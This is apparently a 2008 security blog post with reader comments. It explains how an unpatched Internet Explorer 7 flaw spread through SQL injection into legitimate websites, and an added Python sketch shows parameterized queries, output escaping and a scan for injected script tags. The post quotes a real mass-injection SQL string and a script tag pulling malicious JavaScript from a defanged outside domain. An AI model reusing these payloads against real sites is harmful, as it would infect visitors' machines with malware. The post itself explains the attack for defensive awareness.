And the results are not graceful. Unless you have been living under a rock, you have heard about the latest Internet Explorer 7 unpatched vulnerability. If you browse a web site that has been modified to contain malicious JavaScript, it will download malware to your Windows machine. I first caught wind of it over the weekend when a friend said he was browsing a legitimate training web site when suddenly he saw his Internet Explorer status line change to "Databinding...". That will make your pulse quicken. AV was useless in stopping the attack.

Attackers have been finding web sites with vulnerabilities that allow them to modify the content on the site. By far the most popular vulnerability is SQL Injection. Attackers inject a string like the following into a form field:

rtrim(convert(varchar(4000),['+@C+']))+''<script src=http://17gamo [dot] com/1.js></script>''')FETCH NEXT FROM

They then hope that the data will get read back out of the SQL database at some point and that the web app will send the following JavaScript to a browser:

<script src=http://17gamo [dot] com/1.js></script>

The victim's browser then pulls the malicious JavaScript and the browser gets owned. Internet Storm Center has another nice example where the JavaScript is injected as a cookie value.

It Takes Two to Tango

This is an example of a vulnerability where it takes two to tango. Not only does it require a vulnerable client program connecting to untrusted data on the internet; to spread widely, it also requires vulnerable web applications that an attacker can use to host the malicious payload. I have also heard of ad servers downloading the malicious payload right along with banner ads for Fortune 500 companies. One of the big lessons here is that there is no "safe" area of the internet to browse.

Something that concerns me is that the organizations with the vulnerable web applications don't know it or don't care. They don't have the brand damage of a large software company such as Microsoft, so thousands of small vulnerable web apps keep serving up the latest and greatest malicious payloads for the latest client vulnerabilities. If it isn't Internet Explorer, like this week, it might be Firefox or Flash or a media plug-in. Insecure web applications are helping the criminals win.
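For the owner of a web application, the chain described in this post breaks at three points: binding input as a query parameter, encoding stored text on output, and auditing stored content for script tags that load code from hosts the site does not use. The following Python sketch is an added example, not code from the original post. The `pages` table, the function names and the `example.invalid` host are assumptions made for illustration, with SQLite standing in for the site's real database.

```python
import html
import re
import sqlite3

# A script tag whose src is an absolute or protocol-relative URL; group 2 is the host.
EXTERNAL_SCRIPT = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?\s*(https?:)?//([^/'\"\s>]+)", re.I)

def make_db():
    """In-memory stand-in for a site's content table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.executemany("INSERT INTO pages (title, body) VALUES (?, ?)", [
        ("Course list", "Intro to networking, Mondays"),
        # Constructed sample of a tampered row; example.invalid is a placeholder host.
        ("Schedule", "Week 1<script src=http://example.invalid/1.js></script>"),
        ("Video", '<script src="/static/player.js"></script>'),  # same-site script
    ])
    return db

def find_injected_scripts(db, allowed_hosts=()):
    """Return (row id, column, host) for each stored external script not allowlisted."""
    hits = []
    for row_id, title, body in db.execute("SELECT id, title, body FROM pages"):
        for column, value in (("title", title), ("body", body)):
            for match in EXTERNAL_SCRIPT.finditer(value or ""):
                host = match.group(2).lower()
                if host not in allowed_hosts:
                    hits.append((row_id, column, host))
    return hits

def save_title(db, page_id, user_input):
    """Bound parameters: the input is stored as data and cannot alter the statement."""
    db.execute("UPDATE pages SET title = ? WHERE id = ?", (user_input, page_id))

def render_title(db, page_id):
    """Encode on output so stored markup reaches the browser as inert text."""
    (title,) = db.execute("SELECT title FROM pages WHERE id = ?", (page_id,)).fetchone()
    return "<h1>" + html.escape(title) + "</h1>"

if __name__ == "__main__":
    db = make_db()
    print(find_injected_scripts(db))   # rows to investigate and clean up
    save_title(db, 1, "x'); DROP TABLE pages;--")
    print(render_title(db, 1))
```

A hit from the audit function means the content was already modified, so it calls for finding and fixing the injectable query as well as cleaning the affected rows.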

About Chris Wysopal

Chris Wysopal, co-founder and CTO of Veracode, is recognized as an expert and a well-known speaker in the information security field. He has given keynotes at computer security events and has testified on Capitol Hill on the subjects of government computer security and how vulnerabilities are discovered in software. His opinions on Internet security are highly sought after and most major print and media outlets have featured stories on Mr. Wysopal and his work. At Veracode, Mr. Wysopal is responsible for the security analysis capabilities of Veracode technology.

Comments (2)

Miguel Correia | December 17, 2008 1:29 pm

Great post. There is a third in the tango: cross-site scripting. This is a heap overflow attack, made using a stored cross-site scripting attack made with SQL injection. Yak!

cwysopal | December 17, 2008 7:26 pm


Agreed. Perhaps I should change the title to "IE has a three way with SQL Injection and XSS".

